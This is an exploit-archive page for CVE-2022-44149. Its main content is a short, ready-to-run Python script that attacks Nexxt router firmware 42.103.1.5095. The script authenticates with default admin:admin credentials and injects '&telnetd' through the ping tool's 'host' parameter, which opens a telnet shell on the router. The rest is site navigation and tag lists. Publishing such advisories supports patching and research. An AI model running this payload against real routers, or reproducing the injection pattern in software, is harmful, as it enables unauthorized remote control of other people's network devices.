Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- Nexxt Router Firmware 42.103.1.5095 Remote Code Execution[6]
- Authored by Yerodin Richards[7]
-
Nexxt Router Firmware version 42.103.1.5095 authenticated remote code execution exploit that enables telnetd.
- advisories | CVE-2022-44149[8]
- SHA-256 |
f6b93f8ca64ede0f2262b8069bea1bb4e92c90797cdd7f00227408d3d9a7adb8
- Download[9] | Favorite[10] | View[11]
Change Mirror[12] Download[13]
# Exploit Title: Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated)
# Date: 19/10/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://www.nexxtsolutions.com/
# Version: 42.103.1.5095
# Tested on: ARN02304U8
# CVE : CVE-2022-44149
import requests
import base64
router_host = "http://192.168.1.1"
username = "admin"
password = "admin"
def main():
send_payload("&telnetd")
print("connect to router using: `telnet "+router_host.split("//")[1]+ "` using known credentials")
pass
def gen_header(u, p):
return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")
def send_payload(payload):
url = router_host+"/goform/sysTools"
headers = {"Authorization": "Basic {}".format(gen_header(username, password))}
params = {"tool":"0", "pingCount":"4", "host": payload, "sumbit": "OK"}
requests.post(url, headers=headers, data=params)
if __name__ == '__main__':
main()
File Tags
- ActiveX[18] (932)
- Advisory[19] (79,787)
- Arbitrary[20] (15,706)
- BBS[21] (2,859)
- Bypass[22] (1,623)
- CGI[23] (1,018)
- Code Execution[24] (6,944)
- Conference[25] (674)
- Cracker[26] (840)
- CSRF[27] (3,290)
- DoS[28] (22,609)
- Encryption[29] (2,352)
- Exploit[30] (50,392)
- File Inclusion[31] (4,166)
- File Upload[32] (946)
- Firewall[33] (821)
- Info Disclosure[34] (2,663)
- Intrusion Detection[35] (867)
- Java[36] (2,902)
- JavaScript[37] (821)
- Kernel[38] (6,293)
- Local[39] (14,202)
- Magazine[40] (586)
- Overflow[41] (12,427)
- Perl[42] (1,418)
- PHP[43] (5,093)
- Proof of Concept[44] (2,293)
- Protocol[45] (3,436)
- Python[46] (1,468)
- Remote[47] (30,061)
- Root[48] (3,505)
- Ruby[49] (595)
- Scanner[50] (1,632)
- Security Tool[51] (7,785)
- Shell[52] (3,106)
- Shellcode[53] (1,206)
- Sniffer[54] (886)
- Spoof[55] (2,171)
- SQL Injection[56] (16,110)
- TCP[57] (2,380)
- Trojan[58] (686)
- UDP[59] (877)
- Virus[60] (662)
- Vulnerability[61] (31,157)
- Web[62] (9,370)
- Whitepaper[63] (3,730)
- x86[64] (946)
- XSS[65] (17,498)
- Other[66]
File Archives
- January 2023[67]
- December 2022[68]
- November 2022[69]
- October 2022[70]
- September 2022[71]
- August 2022[72]
- July 2022[73]
- June 2022[74]
- May 2022[75]
- April 2022[76]
- March 2022[77]
- February 2022[78]
- Older[79]
Systems
- AIX[80] (426)
- Apple[81] (1,935)
- BSD[82] (370)
- CentOS[83] (55)
- Cisco[84] (1,917)
- Debian[85] (6,643)
- Fedora[86] (1,690)
- FreeBSD[87] (1,242)
- Gentoo[88] (4,279)
- HPUX[89] (878)
- iOS[90] (333)
- iPhone[91] (108)
- IRIX[92] (220)
- Juniper[93] (67)
- Linux[94] (44,341)
- Mac OS X[95] (684)
- Mandriva[96] (3,105)
- NetBSD[97] (255)
- OpenBSD[98] (479)
- RedHat[99] (12,474)
- Slackware[100] (941)
- Solaris[101] (1,607)
- SUSE[102] (1,444)
- Ubuntu[103] (8,202)
- UNIX[104] (9,165)
- UnixWare[105] (185)
- Windows[106] (6,511)
- Other[107]